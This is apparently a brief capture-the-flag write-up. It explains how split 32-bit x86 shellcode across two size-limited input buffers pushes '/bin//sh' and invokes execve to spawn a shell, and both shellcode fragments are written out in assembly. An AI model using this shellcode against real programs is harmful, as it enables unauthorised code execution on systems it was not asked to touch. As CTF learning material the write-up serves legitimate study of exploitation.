Rating: 4.5

The binary limit the input, we can only input 17 bytes in the first buffer and 16 bytes in the second buffer.
in the 1st buffer we made a 17 bytes shellcode like this
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
lea esi, [ebp-28]
call esi
And for the 2nd buffer, we made the shellcode like this
add esp, 4
mov ebx, esp
xor ecx, ecx
xor edx, edx
mov al, 0xb
int 0x80
in the 1st shellcode, we push "/bin//sh" to esp, and call the 2nd buffer address(lea for load effective address, and call to call it) and set up the stack for syscall so it will execute execve('/bin//sh', 0, 0)